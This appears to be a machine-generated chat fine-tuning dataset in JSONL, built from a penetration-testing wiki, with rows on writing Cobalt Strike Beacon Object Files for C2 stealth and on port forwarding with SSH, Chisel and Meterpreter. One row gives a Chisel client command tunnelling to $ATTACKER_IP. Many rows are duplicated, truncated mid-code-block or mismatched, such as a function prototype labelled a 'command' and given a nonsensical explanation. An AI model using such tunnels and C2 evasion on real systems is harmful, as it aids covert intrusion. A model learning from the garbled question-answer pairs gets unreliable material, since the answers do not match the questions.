GetProcAddress or LoadLibraryA.`\n\nBelow is an example of how to use this approach:\n\nhttps://github.com/matro7sh/bof-collection/blob/main/src/getAV/getAV-ll.c\n\nMore information at this URL: https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/beacon-object-files_main.htm."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is 🛠️ Stealth with C2 - How to write BoF (Beacon Object File)?", "response": "For example, if you need the RegCloseKey function.\n\nLook at the Windows documentation (in our example https://learn.microsoft.com/en-us/windows/win32/api/winreg/nf-winreg-regclosekey) to get the list of the arguments.\n\nIn our case : \n\n``c\nLSTATUS RegCloseKey(\n [in] HKEY hKey\n);\n`\n\nThen, get the name of the library used (at the bottom of the page) in our case it is : Advapi32.lib\n\nWe have to structure it like this : DECLSPEC_IMPORT LSTATUS WINAPI $();\n\nStill in our case, we will get this: DECLSPEC_IMPORT LSTATUS WINAPI ADVAPI32$RegCloseKey(HKEY);\n\nSimply use the function like this in our code: ADVAPI32$RegCloseKeyA(hKey);\n\n> [!TIP]\n> In addition, to use these functions download the library \"beacon.h\" available here.\n\nIt is also possible to load a library and then call the method using methods like GetProcAddress or LoadLibraryA.`\n\nBelow is an example of how to use this approach:\n\nhttps://github.com/matro7sh/bof-collection/blob/main/src/getAV/getAV-ll.c\n\nMore information at this URL: https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/beacon-object-files_main.htm.", "metadata": {"corpus_index": 1379, "category": "persistence", "source_file": "docs/src/evasion/av/stealth.md", "page_title": "🛠️ Stealth with C2", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for 🛠️ Stealth with C2 - How to write BoF (Beacon Object File)?"}, {"role": "assistant", "content": "For example, if you need the RegCloseKey function.\n\nLook at the Windows documentation (in our example https://learn.microsoft.com/en-us/windows/win32/api/winreg/nf-winreg-regclosekey) to get the list of the arguments.\n\nIn our case : \n\n``c\nLSTATUS RegCloseKey(\n [in] HKEY hKey\n);\n`\n\nThen, get the name of the library used (at the bottom of the page) in our case it is : Advapi32.lib\n\nWe have to structure it like this : DECLSPEC_IMPORT LSTATUS WINAPI $();\n\nStill in our case, we will get this: DECLSPEC_IMPORT LSTATUS WINAPI ADVAPI32$RegCloseKey(HKEY);\n\nSimply use the function like this in our code: ADVAPI32$RegCloseKeyA(hKey);\n\n> [!TIP]\n> In addition, to use these functions download the library \"beacon.h\" available here.\n\nIt is also possible to load a library and then call the method using methods like GetProcAddress or LoadLibraryA.`\n\nBelow is an example of how to use this approach:\n\nhttps://github.com/matro7sh/bof-collection/blob/main/src/getAV/getAV-ll.c\n\nMore information at this URL: https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/beacon-object-files_main.htm."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for 🛠️ Stealth with C2 - How to write BoF (Beacon Object File)?", "response": "For example, if you need the RegCloseKey function.\n\nLook at the Windows documentation (in our example https://learn.microsoft.com/en-us/windows/win32/api/winreg/nf-winreg-regclosekey) to get the list of the arguments.\n\nIn our case : \n\n``c\nLSTATUS RegCloseKey(\n [in] HKEY hKey\n);\n`\n\nThen, get the name of the library used (at the bottom of the page) in our case it is : Advapi32.lib\n\nWe have to structure it like this : DECLSPEC_IMPORT LSTATUS WINAPI $();\n\nStill in our case, we will get this: DECLSPEC_IMPORT LSTATUS WINAPI ADVAPI32$RegCloseKey(HKEY);\n\nSimply use the function like this in our code: ADVAPI32$RegCloseKeyA(hKey);\n\n> [!TIP]\n> In addition, to use these functions download the library \"beacon.h\" available here.\n\nIt is also possible to load a library and then call the method using methods like GetProcAddress or LoadLibraryA.`\n\nBelow is an example of how to use this approach:\n\nhttps://github.com/matro7sh/bof-collection/blob/main/src/getAV/getAV-ll.c\n\nMore information at this URL: https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/beacon-object-files_main.htm.", "metadata": {"corpus_index": 1379, "category": "persistence", "source_file": "docs/src/evasion/av/stealth.md", "page_title": "🛠️ Stealth with C2", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use LSTATUS for 🛠️ stealth with c2 - how to write bof (beacon object file)?"}, {"role": "assistant", "content": "LSTATUS RegCloseKey(\n [in] HKEY hKey\n);"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use LSTATUS for 🛠️ stealth with c2 - how to write bof (beacon object file)?", "response": "LSTATUS RegCloseKey(\n [in] HKEY hKey\n);", "metadata": {"corpus_index": 1380, "category": "persistence", "source_file": "docs/src/evasion/av/stealth.md", "page_title": "🛠️ Stealth with C2", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "LSTATUS"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for 🛠️ Stealth with C2 - How to write BoF (Beacon Object File)?"}, {"role": "assistant", "content": "LSTATUS RegCloseKey(\n [in] HKEY hKey\n);"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for 🛠️ Stealth with C2 - How to write BoF (Beacon Object File)?", "response": "LSTATUS RegCloseKey(\n [in] HKEY hKey\n);", "metadata": {"corpus_index": 1380, "category": "persistence", "source_file": "docs/src/evasion/av/stealth.md", "page_title": "🛠️ Stealth with C2", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `LSTATUS RegCloseKey(`?"}, {"role": "assistant", "content": "This command is used for 🛠️ stealth with c2 - how to write bof (beacon object file). How to write BoF (Beacon Object File)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `LSTATUS RegCloseKey(`?", "response": "This command is used for 🛠️ stealth with c2 - how to write bof (beacon object file). How to write BoF (Beacon Object File)", "metadata": {"corpus_index": 1380, "category": "persistence", "source_file": "docs/src/evasion/av/stealth.md", "page_title": "🛠️ Stealth with C2", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about 🛠️ Port forwarding"}, {"role": "assistant", "content": "> [!WARNING]\n> This is a work-in-progress. It's indicated with the 🛠️ emoji in the page name or in the category name. Need to do some SSH config work"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about 🛠️ Port forwarding", "response": "> [!WARNING]\n> This is a work-in-progress. It's indicated with the 🛠️ emoji in the page name or in the category name. Need to do some SSH config work", "metadata": {"corpus_index": 1381, "category": "network", "source_file": "docs/src/infra/pivoting/port-forwarding.md", "page_title": "🛠️ Port forwarding", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out 🛠️ Port forwarding during a pentest?"}, {"role": "assistant", "content": "> [!WARNING]\n> This is a work-in-progress. It's indicated with the 🛠️ emoji in the page name or in the category name. Need to do some SSH config work"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out 🛠️ Port forwarding during a pentest?", "response": "> [!WARNING]\n> This is a work-in-progress. It's indicated with the 🛠️ emoji in the page name or in the category name. Need to do some SSH config work", "metadata": {"corpus_index": 1381, "category": "network", "source_file": "docs/src/infra/pivoting/port-forwarding.md", "page_title": "🛠️ Port forwarding", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about 🛠️ Port forwarding - Theory?"}, {"role": "assistant", "content": "Port forwarding is a pivoting technique that allows network packets to be relayed from a port to another. The tunnel can be setup between two controlled and connected machines, hence allowing a bridge between a network and another. That concept is similar to PAT (Port Address Translation), an extension of NAT (Network Address Translation) that allows multiple devices on a LAN to be mapped to a single public IP address by assigning addresses to ports numbers.\n\nThis technique is useful when an attacker wants to stay under the radar or when access to a service is limited to a specific network."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about 🛠️ Port forwarding - Theory?", "response": "Port forwarding is a pivoting technique that allows network packets to be relayed from a port to another. The tunnel can be setup between two controlled and connected machines, hence allowing a bridge between a network and another. That concept is similar to PAT (Port Address Translation), an extension of NAT (Network Address Translation) that allows multiple devices on a LAN to be mapped to a single public IP address by assigning addresses to ports numbers.\n\nThis technique is useful when an attacker wants to stay under the radar or when access to a service is limited to a specific network.", "metadata": {"corpus_index": 1382, "category": "network", "source_file": "docs/src/infra/pivoting/port-forwarding.md", "page_title": "🛠️ Port forwarding", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on 🛠️ Port forwarding - Theory"}, {"role": "assistant", "content": "Port forwarding is a pivoting technique that allows network packets to be relayed from a port to another. The tunnel can be setup between two controlled and connected machines, hence allowing a bridge between a network and another. That concept is similar to PAT (Port Address Translation), an extension of NAT (Network Address Translation) that allows multiple devices on a LAN to be mapped to a single public IP address by assigning addresses to ports numbers.\n\nThis technique is useful when an attacker wants to stay under the radar or when access to a service is limited to a specific network."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on 🛠️ Port forwarding - Theory", "response": "Port forwarding is a pivoting technique that allows network packets to be relayed from a port to another. The tunnel can be setup between two controlled and connected machines, hence allowing a bridge between a network and another. That concept is similar to PAT (Port Address Translation), an extension of NAT (Network Address Translation) that allows multiple devices on a LAN to be mapped to a single public IP address by assigning addresses to ports numbers.\n\nThis technique is useful when an attacker wants to stay under the radar or when access to a service is limited to a specific network.", "metadata": {"corpus_index": 1382, "category": "network", "source_file": "docs/src/infra/pivoting/port-forwarding.md", "page_title": "🛠️ Port forwarding", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is 🛠️ Port forwarding - Practice?"}, {"role": "assistant", "content": "There are multiple types of port forwarding used during penetration testing engagements.\n\n* Local port forwarding: access a port that only a remote machine can communicate with (e.g. \"firewalled\" network, internal localhost network).\n* Remote port forwarding: access an attacker's service (from the attacker's machine's networks) from a remote workstation that can't access those networks directly.\n* Dynamic port forwarding: tunnel the whole attacker's network traffic (instead of only one port) through a remote machine. Explained in SOCKS proxy.\n* Reverse dynamic port forwarding: tunnel the whole network traffic from a remote machine through the attacker's machine. Explained in SOCKS proxy."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is 🛠️ Port forwarding - Practice?", "response": "There are multiple types of port forwarding used during penetration testing engagements.\n\n* Local port forwarding: access a port that only a remote machine can communicate with (e.g. \"firewalled\" network, internal localhost network).\n* Remote port forwarding: access an attacker's service (from the attacker's machine's networks) from a remote workstation that can't access those networks directly.\n* Dynamic port forwarding: tunnel the whole attacker's network traffic (instead of only one port) through a remote machine. Explained in SOCKS proxy.\n* Reverse dynamic port forwarding: tunnel the whole network traffic from a remote machine through the attacker's machine. Explained in SOCKS proxy.", "metadata": {"corpus_index": 1383, "category": "network", "source_file": "docs/src/infra/pivoting/port-forwarding.md", "page_title": "🛠️ Port forwarding", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform 🛠️ Port forwarding - Practice?"}, {"role": "assistant", "content": "There are multiple types of port forwarding used during penetration testing engagements.\n\n* Local port forwarding: access a port that only a remote machine can communicate with (e.g. \"firewalled\" network, internal localhost network).\n* Remote port forwarding: access an attacker's service (from the attacker's machine's networks) from a remote workstation that can't access those networks directly.\n* Dynamic port forwarding: tunnel the whole attacker's network traffic (instead of only one port) through a remote machine. Explained in SOCKS proxy.\n* Reverse dynamic port forwarding: tunnel the whole network traffic from a remote machine through the attacker's machine. Explained in SOCKS proxy."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform 🛠️ Port forwarding - Practice?", "response": "There are multiple types of port forwarding used during penetration testing engagements.\n\n* Local port forwarding: access a port that only a remote machine can communicate with (e.g. \"firewalled\" network, internal localhost network).\n* Remote port forwarding: access an attacker's service (from the attacker's machine's networks) from a remote workstation that can't access those networks directly.\n* Dynamic port forwarding: tunnel the whole attacker's network traffic (instead of only one port) through a remote machine. Explained in SOCKS proxy.\n* Reverse dynamic port forwarding: tunnel the whole network traffic from a remote machine through the attacker's machine. Explained in SOCKS proxy.", "metadata": {"corpus_index": 1383, "category": "network", "source_file": "docs/src/infra/pivoting/port-forwarding.md", "page_title": "🛠️ Port forwarding", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is 🛠️ Port forwarding - Basic setup?"}, {"role": "assistant", "content": "> [!TIP]\n> While setting up port forwarding, it's important to remember that non-admin users can only open ports above 1024.\n\nPort forwarding can be set up in many different ways.\n\n::: tabs\n\n=== SSH\n\nSSH commands\n\nOne of the most easy is by relying on SSH however, it requires to have an SSH server running on the controlled machine and a valid account. The tester needs to open an SSH connection to the machine that should be turned into a SOCKS proxy, and supply \n\n* the -L option for a local port forwarding, along with the ports and addresses to bind\n* the -R option for a remote port forwarding, along with the ports and addresses to bind\n\nThe command can also be used with -N option to make sure no command gets executed after the SSH session is opened.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is 🛠️ Port forwarding - Basic setup?", "response": "> [!TIP]\n> While setting up port forwarding, it's important to remember that non-admin users can only open ports above 1024.\n\nPort forwarding can be set up in many different ways.\n\n::: tabs\n\n=== SSH\n\nSSH commands\n\nOne of the most easy is by relying on SSH however, it requires to have an SSH server running on the controlled machine and a valid account. The tester needs to open an SSH connection to the machine that should be turned into a SOCKS proxy, and supply \n\n* the -L option for a local port forwarding, along with the ports and addresses to bind\n* the -R option for a remote port forwarding, along with the ports and addresses to bind\n\nThe command can also be used with -N option to make sure no command gets executed after the SSH session is opened.\n\n```bash", "metadata": {"corpus_index": 1384, "category": "network", "source_file": "docs/src/infra/pivoting/port-forwarding.md", "page_title": "🛠️ Port forwarding", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for 🛠️ Port forwarding - Basic setup"}, {"role": "assistant", "content": "> [!TIP]\n> While setting up port forwarding, it's important to remember that non-admin users can only open ports above 1024.\n\nPort forwarding can be set up in many different ways.\n\n::: tabs\n\n=== SSH\n\nSSH commands\n\nOne of the most easy is by relying on SSH however, it requires to have an SSH server running on the controlled machine and a valid account. The tester needs to open an SSH connection to the machine that should be turned into a SOCKS proxy, and supply \n\n* the -L option for a local port forwarding, along with the ports and addresses to bind\n* the -R option for a remote port forwarding, along with the ports and addresses to bind\n\nThe command can also be used with -N option to make sure no command gets executed after the SSH session is opened.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for 🛠️ Port forwarding - Basic setup", "response": "> [!TIP]\n> While setting up port forwarding, it's important to remember that non-admin users can only open ports above 1024.\n\nPort forwarding can be set up in many different ways.\n\n::: tabs\n\n=== SSH\n\nSSH commands\n\nOne of the most easy is by relying on SSH however, it requires to have an SSH server running on the controlled machine and a valid account. The tester needs to open an SSH connection to the machine that should be turned into a SOCKS proxy, and supply \n\n* the -L option for a local port forwarding, along with the ports and addresses to bind\n* the -R option for a remote port forwarding, along with the ports and addresses to bind\n\nThe command can also be used with -N option to make sure no command gets executed after the SSH session is opened.\n\n```bash", "metadata": {"corpus_index": 1384, "category": "network", "source_file": "docs/src/infra/pivoting/port-forwarding.md", "page_title": "🛠️ Port forwarding", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Local port forwarding?"}, {"role": "assistant", "content": "ssh -N -L $LOCAL_ADDRESS:$LOCAL_PORT:$REMOTE_ADDRESS:$REMOTE_PORT user@target"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Local port forwarding?", "response": "ssh -N -L $LOCAL_ADDRESS:$LOCAL_PORT:$REMOTE_ADDRESS:$REMOTE_PORT user@target", "metadata": {"corpus_index": 1385, "category": "network", "source_file": "docs/src/infra/pivoting/port-forwarding.md", "page_title": "🛠️ Port forwarding", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Local port forwarding"}, {"role": "assistant", "content": "ssh -N -L $LOCAL_ADDRESS:$LOCAL_PORT:$REMOTE_ADDRESS:$REMOTE_PORT user@target"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Local port forwarding", "response": "ssh -N -L $LOCAL_ADDRESS:$LOCAL_PORT:$REMOTE_ADDRESS:$REMOTE_PORT user@target", "metadata": {"corpus_index": 1385, "category": "network", "source_file": "docs/src/infra/pivoting/port-forwarding.md", "page_title": "🛠️ Port forwarding", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Remote port forwarding?"}, {"role": "assistant", "content": "ssh -N -R $REMOTE_ADDRESS:$REMOTE_PORT:$LOCAL_ADDRESS:$LOCAL_PORT user@target\n``\n\nOnce the ssh command exits successful (or once a session opens) the tester can then proceed to use the tunnel.\n\n---\n\nSSH configs\n\nThe same operations can be conducted through a pre-configured agent instead of using command-line argument. TODO\n\n=== Chisel\n\nChisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server. Written in Go (golang). Chisel is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network.\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Remote port forwarding?", "response": "ssh -N -R $REMOTE_ADDRESS:$REMOTE_PORT:$LOCAL_ADDRESS:$LOCAL_PORT user@target\n``\n\nOnce the ssh command exits successful (or once a session opens) the tester can then proceed to use the tunnel.\n\n---\n\nSSH configs\n\nThe same operations can be conducted through a pre-configured agent instead of using command-line argument. TODO\n\n=== Chisel\n\nChisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server. Written in Go (golang). Chisel is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network.\n\n``bash", "metadata": {"corpus_index": 1386, "category": "network", "source_file": "docs/src/infra/pivoting/port-forwarding.md", "page_title": "🛠️ Port forwarding", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Remote port forwarding"}, {"role": "assistant", "content": "ssh -N -R $REMOTE_ADDRESS:$REMOTE_PORT:$LOCAL_ADDRESS:$LOCAL_PORT user@target\n``\n\nOnce the ssh command exits successful (or once a session opens) the tester can then proceed to use the tunnel.\n\n---\n\nSSH configs\n\nThe same operations can be conducted through a pre-configured agent instead of using command-line argument. TODO\n\n=== Chisel\n\nChisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server. Written in Go (golang). Chisel is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network.\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Remote port forwarding", "response": "ssh -N -R $REMOTE_ADDRESS:$REMOTE_PORT:$LOCAL_ADDRESS:$LOCAL_PORT user@target\n``\n\nOnce the ssh command exits successful (or once a session opens) the tester can then proceed to use the tunnel.\n\n---\n\nSSH configs\n\nThe same operations can be conducted through a pre-configured agent instead of using command-line argument. TODO\n\n=== Chisel\n\nChisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server. Written in Go (golang). Chisel is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network.\n\n``bash", "metadata": {"corpus_index": 1386, "category": "network", "source_file": "docs/src/infra/pivoting/port-forwarding.md", "page_title": "🛠️ Port forwarding", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the Once command to remote port forwarding"}, {"role": "assistant", "content": "Once the ssh command exits successful (or once a session opens) the tester can then proceed to use the tunnel.\n\n---\n\n**SSH configs**\n\nThe same operations can be conducted through a pre-configured agent instead of using command-line argument. TODO\n\n\n=== Chisel\n\nChisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server. Written in Go (golang). Chisel is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the Once command to remote port forwarding", "response": "Once the ssh command exits successful (or once a session opens) the tester can then proceed to use the tunnel.\n\n---\n\n**SSH configs**\n\nThe same operations can be conducted through a pre-configured agent instead of using command-line argument. TODO\n\n\n=== Chisel\n\nChisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server. Written in Go (golang). Chisel is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network.", "metadata": {"corpus_index": 1387, "category": "network", "source_file": "docs/src/infra/pivoting/port-forwarding.md", "page_title": "🛠️ Port forwarding", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Once"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Remote port forwarding?"}, {"role": "assistant", "content": "Once the ssh command exits successful (or once a session opens) the tester can then proceed to use the tunnel.\n\n---\n\n**SSH configs**\n\nThe same operations can be conducted through a pre-configured agent instead of using command-line argument. TODO\n\n\n=== Chisel\n\nChisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server. Written in Go (golang). Chisel is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Remote port forwarding?", "response": "Once the ssh command exits successful (or once a session opens) the tester can then proceed to use the tunnel.\n\n---\n\n**SSH configs**\n\nThe same operations can be conducted through a pre-configured agent instead of using command-line argument. TODO\n\n\n=== Chisel\n\nChisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server. Written in Go (golang). Chisel is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network.", "metadata": {"corpus_index": 1387, "category": "network", "source_file": "docs/src/infra/pivoting/port-forwarding.md", "page_title": "🛠️ Port forwarding", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Once the ssh command exits successful (or once a session opens) the tester can then proceed to use the tunnel.`?"}, {"role": "assistant", "content": "This command is used for remote port forwarding. Remote port forwarding"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Once the ssh command exits successful (or once a session opens) the tester can then proceed to use the tunnel.`?", "response": "This command is used for remote port forwarding. Remote port forwarding", "metadata": {"corpus_index": 1387, "category": "network", "source_file": "docs/src/infra/pivoting/port-forwarding.md", "page_title": "🛠️ Port forwarding", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Victime machine work?"}, {"role": "assistant", "content": ".\\chisel.exe client $ATTACKER_IP:$ATTACKER_PORT R:$REMOTE_PORT:localhost:$LOCAL_PORT\n``\n\n> [!TIP]\n> Chisel binaries can be downloaded from the official GitHub repository.\n\n=== Metasploit\n\nMeterpreter features built in port forwarding capabilities with the portfwd cmdlet.\n\n* the -l option for a local port forwarding, along with the ports and addresses to bind.\n* the -p option for a remote port forwarding, along with the ports and addresses to bind.\n* the -r option for the targeted remote machine IP address.\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Victime machine work?", "response": ".\\chisel.exe client $ATTACKER_IP:$ATTACKER_PORT R:$REMOTE_PORT:localhost:$LOCAL_PORT\n``\n\n> [!TIP]\n> Chisel binaries can be downloaded from the official GitHub repository.\n\n=== Metasploit\n\nMeterpreter features built in port forwarding capabilities with the portfwd cmdlet.\n\n* the -l option for a local port forwarding, along with the ports and addresses to bind.\n* the -p option for a remote port forwarding, along with the ports and addresses to bind.\n* the -r option for the targeted remote machine IP address.\n\n``bash", "metadata": {"corpus_index": 1388, "category": "network", "source_file": "docs/src/infra/pivoting/port-forwarding.md", "page_title": "🛠️ Port forwarding", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Victime machine"}, {"role": "assistant", "content": ".\\chisel.exe client $ATTACKER_IP:$ATTACKER_PORT R:$REMOTE_PORT:localhost:$LOCAL_PORT\n``\n\n> [!TIP]\n> Chisel binaries can be downloaded from the official GitHub repository.\n\n=== Metasploit\n\nMeterpreter features built in port forwarding capabilities with the portfwd cmdlet.\n\n* the -l option for a local port 